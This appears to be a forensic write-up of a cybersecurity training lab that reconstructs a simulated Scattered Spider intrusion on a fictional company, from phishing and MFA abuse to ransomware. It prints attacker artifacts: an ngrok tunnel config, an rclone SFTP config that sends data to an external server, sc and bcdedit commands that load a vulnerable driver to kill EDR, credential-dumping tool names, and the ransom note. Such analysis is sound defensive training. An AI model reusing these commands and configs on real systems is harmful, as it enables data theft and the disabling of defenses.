xintra ab projekt blue lab

Initial Situation

There are three known users at AB Projekt Blue which have been using dedicated Workstations:

• Maya Sterlin at ABPK-WKS01 (10.183.3.11)
• Dmitri Volkov at ABPK-WKS02 (10.183.3.12)
• Priya Menon at ABPK-WKS03 (10.183.3.13)

Additionaly the company uses Microsoft 365 products including SharePoint, Exchange and Teams. The attack campaign spanned from July 20 to July 30, 2025. Initial telemetry flagged suspicious login activity involving a corporate email account, followed by the registration of a new MFA method under unusual conditions.

Executive Summary

On July 21, 2025, a phishing email led to the compromise of Maya Sterlins Microsoft 365 account, granting unauthorized access to company resources by the threat actor Scattered Spider (identified based on multiple techniques and indicators). In the following days, the attacker exfiltrated sensitive company and business data, maintained persistent access across multiple workstations, and ultimately carried out a targeted ransomware attack.

Within a day, the attacker collected sensitive company and business data from Azure and SharePoint. Using the compromised account, the threat actor leveraged Teams messages to trick other employees into installing remote management tools on multiple workstations. Additional accounts were created on WKS02 and WKS03 for persistence, and system secrets were extracted. The attacker also established a tunnel to the MSSQL database, though no further compromise was confirmed.

Local data was exfiltrated via SFTP to an external server, and endpoint detection was disabled using publicly available tools. The attack culminated in lateral movement to WKS01 and encryption of WKS01, WKS02, and WKS03 using a custom encryption tool.

The incident resulted in compromise of critical accounts, unauthorized access to sensitive data, disruption of multiple workstations, and deployment of ransomware. Immediate remediation, further forensic investigation, and review of endpoint defenses and user security awareness are recommended.

Analysis

The following analysis presents a detailed breakdown of the incident, structured according to the distinct phases of the attack. Each event is documented chronologically in a detailed timeline in the end, and all timestamps are provided in Coordinated Universal Time (UTC) for consistency. For a brief overview, refer to the following timeline of events:

Initial Access

At July 21 01:29:29 Maya Sterlin received an email from [email protected] claiming account verification failure. This is supported by the fact that, shortly beforehand, an IGN account (gaming context) was created using her email address, and that she had already been subjected to MFA fatigue attacks the day before. She responded to the initial email, which promptly was followed by another message containing a phishing landing page (https://login.secureaccesonline.com/iLyXOozI) designed to gain access to her M365 account. Maya accessed the malicious link via ABPB-WKS01 at 01:39:52 (UTC) using Edge and subsequently signed in, falling victim to the phishing attack. The threat actor (TA) successfully authenticated from 37.231.101.228 at 02:10:13. Immediately after, they added a new MFA device to Maya’s account. This action granted the attacker long-term persistence and bypassed MFA protections.

Lateral Movement

A Teams session using the DeviceId 7d33b2a2-62c3-4cba-8b51-aaafc9d2ec67 utilising the compromised account ([email protected]) was used to send Teams messages to colleagues Priya Menon and Dmitri Volkov and instructed them to install an “internal helpdesk tool” at 2025-07-23 02:57:57 and 02:58:01.

The newly gained access to the AnyDesk connections was later used multiple times to successfully connect to WKS02 and WKS03. On WKS02, ngrok was installed via Chocolatey using the Adminstrator account. An auth token (2uSsg9WbMZ7Vxwx9qbDdMQ4Ear7_5jEkcWxqLmYrEiZ8v3oe7) and configuration file (C:\Users\Adminstrator\AppData\Local\ngrok\ngrok.yml) were added to tunnel a connection to 10.183.2.9 (ABP-MSSQL) on port 1433. No malicious activity was detected on this host.

# C:\Users\Adminstrator\AppData\Local\ngrok\ngrok.yml
version: "3"
agent:
    authtoken: 2uSsg9WbMZ7Vxwx9qbDdMQ4Ear7_5jEkcWxqLmYrEiZ8v3oe7
tunnels:
  mssql:
    proto: tcp
    addr: 10.183.2.9:1433

After compromising WKS02 and the priya account this was used to send another MS Teams Message to Maya Sterlin, telling her to install “software for patching and updates”, which lead to the compromise of WKS01.

Persistence

The “internal helpdesk tool” was a customized Atera Agent using [email protected] and AccountId=001Q300000UV3l7IAD, giving the attacker access to their systems. Dmitri installed the custom Atera agent on WKS02, and Priya on WKS03. Once Atera was active, the agent delivered multiple other remote access agents to strengthen persistence and redundancy.

AnyDesk and Splashtop Remote Support have been installed and configured with regular updates. On WKS02 several net commands were executed to create a new local user account named Adminstrator (sic!) with the password P@ssw0rd and the account was added to both the local Administrators group and the Remote Desktop Users group. Another Adminstrator account with the known password is created on WKS03 too, also added to local Administrators and Remote Desktop Users group.

Execution

The Adminstrator account on WKS02 was used to execute multiple SharpDPAPI commands, the comsvcs MiniDump function and SharpMiniDump to dump credentials and secrets from this host. PsExec was used to obtain SYSTEM-level shells, which was then used to re-execute some of the dumping commands. Additionally both the the dmitri and the priya accounts were used to execute multiple commands to dump DPAPI-protected data, and to download, extract, and run mimikatz on their respective systems.

Exfiltration

AzureHound has been used from the known malicious IP (37.231.101.228) to map the tenant and identify points of entry to the companies infrastructure. Additionally SharePoint enumeration was conducted using a Python script using the requests module. Following this, 101 files were scraped from /sites/CyberFunk/Shared Documents/. On one of the hosts (WKS03) rclone was used with a SFTP config to copy cyberfunk.rar to their DigitalOcean droplet, using the compromised priya user account and their sftp user lootuser:P@ssw0rd123!!!.

[do-sftp]
type = sftp
host = 206.189.13.43
user = lootuser
pass = 4SJ73EO3mE9wDFTqgCNDLTRRNTSHv3zfjNyjM9TE
shell_type = unix
md5sum_command = md5sum
sha1sum_command = sha1sum

Defense Evasion

Blackout (.exe and .sys), edr_killer.exe and killer.exe and a driver 8e92cc393a7f6acda90fff42925c42d2082dad593740ae2698d597dca5d1e7fc.SYS downloaded from github have been deployed to WKS03 trying to disable the wazuh agent.

(Get-Item .\8e92cc393a7f6acda90fff42925c42d2082dad593740ae2698d597dca5d1e7fc.SYS).VersionInfo | Format-List

OriginalFilename  : viragt64.sys
FileDescription   : VirIT Agent System
ProductName       : VirIT Agent System
Comments          : www.tgsoft.it
CompanyName       : TG Soft S.a.s.
FileVersion       : 1, 0, 0, 11
ProductVersion    : 1, 0, 0, 11

[...SNIP...]

(Get-AuthenticodeSignature .\8e92cc393a7f6acda90fff42925c42d2082dad593740ae2698d597dca5d1e7fc.SYS).SignerCertificate | Format-List

Subject      : CN=TG Soft S.a.s. Di Tonello Gianfranco e C., O=TG Soft S.a.s. Di Tonello Gianfranco e C., L=Rubano, S=Padova, C=IT
Issuer       : CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Thumbprint   : F4C6351C18F8D13D9BC573CD655F65552ED0A028
FriendlyName :
NotBefore    : 1/20/2016 1:00:00 AM
NotAfter     : 3/12/2019 12:59:59 AM
Extensions   : {System.Security.Cryptography.Oid, System.Security.Cryptography.Oid, System.Security.Cryptography.Oid, System.Security.Cryptography.Oid...}

The known vulnerable driver has been configured to start via Service Control using the command lines sc create killer type= kernel binPath =C:\Users\priya\Downloads\8e92cc393a7f6acda90fff42925c42d2082dad593740ae2698d597dca5d1e7fc.SYS and sc start killer. Additionaly, while struggling to disable the agent, the attacker activated test signing mode bcdedit /set testsigning on and deactivated integrity checks via bcdedit /set nointegritychecks on.

Impact

On on WKS01 (2025-07-24 02:46:38), WKS02 (2025-07-24 02:23:14) and WKS03 (2025-07-24 02:20:40) a custom ransomware executable named main.exe was deployed and executed immediately afterward leaving the systems and their data encrypted. This encryption does only happen when the accompanying public.key is dropped next to the file, without this the binary will not execute its payload ("error":"could not find public key file: open pkg/config/public.key: The system cannot find the path specified.").

>>> YOUR NETWORK HAS BEEN COMPROMISED <<<

All files on this system have been encrypted.
We have also exfiltrated sensitive documents, credentials, emails, and proprietary data.

Do not attempt recovery. Do not contact third parties. Any such action will trigger automatic leaks.

---

To restore your data and prevent public release, you must pay:
$5,000,000 USD in Bitcoin

Deadline: 72 hours from now.

---

As proof, you may submit 3 small encrypted files. We will decrypt them for free.

---

Access the negotiation portal:
http://r3c0veryp4yment6zv6.onion

Login ID: A91D-7F2X-34QP
Auth Token: d7f982c99a1b4ec2aef3c1248b55f712

---

Failure to comply will result in total data loss and public release of all stolen information.

We are watching.

Technical Timeline

Additional Resources

• https://support.atera.com/hc/en-us/articles/360019885839-AnyDesk-remote-access
• https://blog.talosintelligence.com/exploring-vulnerable-windows-drivers/